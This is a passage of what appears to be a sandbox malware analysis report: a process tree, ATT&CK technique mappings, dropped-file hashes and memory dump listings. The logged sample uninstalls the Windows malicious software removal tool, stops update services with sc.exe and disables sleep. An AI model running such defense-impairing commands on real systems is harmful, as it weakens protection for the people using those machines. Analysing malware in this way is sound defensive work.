  - Modifies data under HKEY_USERS
  PID:1780
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:3068
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:1648
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:848
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:1852
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:2100
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:1836
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:1704
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  PID:2268
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  PID:2552
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  PID:756
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  PID:1928
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:1548
- C:\Windows\system32\conhost.exe
  conhost.exe
  2⤵
  PID:2992

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\oaocofwmfjha\gmstcccpdzbb.exe

Filesize
4.0MB

MD5
66e7e13f5174dd1558fe12d6eab50b0d

SHA1
f1ef209c02c2b4e7aa4d1e99068e3e9fe45b51e9

SHA256
326135f25eff5cc8f0ec045467a24a326e88745c0efaa03ff04d220ea4b13105

SHA512
b941640c71070b164d7f5b92a6ccffb4c2b69c45d54bb083f0dc7d9fed098618fd7ed4cf245aeba435bdbef13b844f3dccf4a4b1a576edacecb631255da0b1cb

Download Submit
C:\ProgramData\oaocofwmfjha\gmstcccpdzbb.exe

Filesize
4.2MB

MD5
1694a7e94cdbb7b4bbdcc7d39db9665c

SHA1
d9edcbc7848ec39abf724c9e9e0da6475eed1e91

SHA256
66dcd34feca9880f03d1486f9ad8ca02c3760669b23ef17afb65ab620dfc49c0

SHA512
7b4d6e4bf038721535a83d97fe060bcc56972ad732a6fbd4a66acfaec998eb8aed91f376b09437269bcbac120bd39ca89e5f4bc8eade293faeaaff07943ac436

Download Submit
C:\ProgramData\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0520000052000052.exe

Filesize
89KB

MD5
499e35df562563babfff6a1d2ee71743

SHA1
7bece5115d9df1fa43b6a7a69f9574a498388960

SHA256
6ebd5512d5cede4fdf769c35a48727c5fd5acb8ac40ae4c5ea7e9ca37fc8747b

SHA512
2df1934de1f45661ab929a7f7658478f5a3d8cacfbe682f1f6b8bee8a49ab2720141a1c0ea74608e14002ff5132cb0932c7fb5b3790575b5e23c5327adfdf377

Download Submit
C:\Users\Admin\AppData\Local\Temp\rjvwuf.exe

Filesize
229KB

MD5
f94e3703ca371767d93f5a88b74fbee7

SHA1
80530e8ffb3fc7d2c36e339b70bcae0d0014b7f5

SHA256
954af7a9095306263dce0c4d05eda925de49041ad6ea7c37a23fed8cbc97f1d7

SHA512
ca0ba2f5a26a26eeb0e15a5b99be937b7d695411f043b1629ef10f7106f26a1096229f763b0ab86796d8f37efc62f469e399206d7a8c706e4043112269f01066

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
d65b4e32aabe27e536fa6e022e261898

SHA1
eac588b8baae14e1630ff26986b7438442c73e35

SHA256
99290594f3ab6c8513111ceb80dce67ccee67576226332bbade94175c984b393

SHA512
9862a621bc0db50d24fed9f533437138305b07d4356f285cb7e6df0110c67c184bac1e2bf6e2fcd759e306ee886936bdccb6b2713d12eb6a279e629990da532d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
df16b737d2b17300089b7929e770638e

SHA1
058b36d7f1d1157957194779deb8c0f1c488f4b9

SHA256
3fcd827dde75838ff8ba78aed57a9441037a835299643dfc88e2c6188dd54201

SHA512
429411fbba4ec21e8128a89f2f8afdad747e81cccc19f76647e55fe0ab12c7aec87ec6b647820bd2dfb701cdf3fad0e29a192876cf852e7b920eba5542309de4

Download Submit
\ProgramData\oaocofwmfjha\gmstcccpdzbb.exe

Filesize
3.9MB

MD5
c67da1302d15ac126dd83ad15feae07c

SHA1
97d0354b914da35ec3a0a82e4517437377f6d7b6

SHA256
7d6e3af82cc409217b54fa431084ee6195087e0f8e7c236dc93b38957bad1baf

SHA512
23e1448c6f538637f6aec33cee9050499f0b70fca9308244161572f920e6fc678fc9ae814b813e4af95f6be1589da31eae0c8b9d5780f67b0dd469ac91117f7a

Download Submit
\ProgramData\oaocofwmfjha\gmstcccpdzbb.exe

Filesize
4.4MB

MD5
c379ea878a21194d58e8a4303cd69ef9

SHA1
1dd404638a2357ace1313ea747e7e3a76ac0790b

SHA256
4350529c8e25e931298764dfec8d72302ca1a8038bc2f5f1054527f1cef0c412

SHA512
f12802ca704490ac6a658841e21627252bc69b5c5b84a21acc0aa67052c0e439e2a6da11ef77857896088d5eef22e33fac94de860b93dff6065d9a1ea6f9b902

Download Submit
\Users\Admin\AppData\Local\Temp\haoqla.exe

Filesize
5.0MB

MD5
130df035c0e6dff9670a1ac38a05c575

SHA1
4b92ff37f74367e9f061a14234afeb78996b3dde

SHA256
3456657a4b93eae6c909e3fbd9db371198fa8accc9b5317bc0bbc1eaf105f8ce

SHA512
eb8dd85776a71956eeb396c34ded4714160f22cba111989d94f39d853551e5b1e0fa064003bee3ec0b07cfe58b5e8f6728bd54d706b7a6b3833f73b797ca6fa4

Download Submit
memory/1004-36-0x0000000000280000-0x000000000029C000-memory.dmp

Filesize
112KB

Download
memory/1548-122-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1548-119-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1548-120-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1548-117-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1548-124-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1548-118-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1780-113-0x00000000009A0000-0x00000000009A8000-memory.dmp

Filesize
32KB

Download
memory/1848-89-0x0000000000070000-0x000000000008C000-memory.dmp

Filesize
112KB

Download
memory/1956-37-0x000007FEF5B33000-0x000007FEF5B34000-memory.dmp

Filesize
4KB

Download
memory/1956-2-0x000007FEF5B30000-0x000007FEF651C000-memory.dmp

Filesize
9.9MB

Download
memory/1956-1-0x0000000000A60000-0x0000000000A7C000-memory.dmp

Filesize
112KB

Download
memory/1956-40-0x000007FEF5B30000-0x000007FEF651C000-memory.dmp

Filesize
9.9MB

Download
memory/1956-39-0x0000000002290000-0x000000000229C000-memory.dmp

Filesize
48KB

Download
memory/1956-38-0x0000000002280000-0x000000000228C000-memory.dmp

Filesize
48KB

Download
memory/1956-0-0x000007FEF5B33000-0x000007FEF5B34000-memory.dmp

Filesize
4KB

Download
memory/2152-141-0x00000000001D0000-0x00000000001EC000-memory.dmp

Filesize
112KB

Download
memory/2216-46-0x0000000000D20000-0x0000000000D60000-memory.dmp

Filesize
256KB

Download
memory/2500-7-0x0000000002B60000-0x0000000002BE0000-memory.dmp

Filesize
512KB

Download
memory/2500-9-0x0000000002320000-0x0000000002328000-memory.dmp

Filesize
32KB

Download
memory/2500-8-0x000000001B690000-0x000000001B972000-memory.dmp

Filesize
2.9MB

Download
memory/2672-102-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/2672-101-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/2904-108-0x0000000001FB0000-0x0000000001FB8000-memory.dmp

Filesize
32KB

Download
memory/2936-15-0x000000001B620000-0x000000001B902000-memory.dmp

Filesize
2.9MB

Download
memory/2936-16-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

Filesize
32KB

Download
memory/2992-128-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2992-131-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2992-130-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2992-134-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2992-127-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2992-133-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2992-132-0x0000000000140000-0x0000000000160000-memory.dmp

Filesize
128KB

Download
memory/2992-129-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2992-125-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2992-135-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2992-136-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2992-137-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2992-138-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2992-139-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2992-126-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download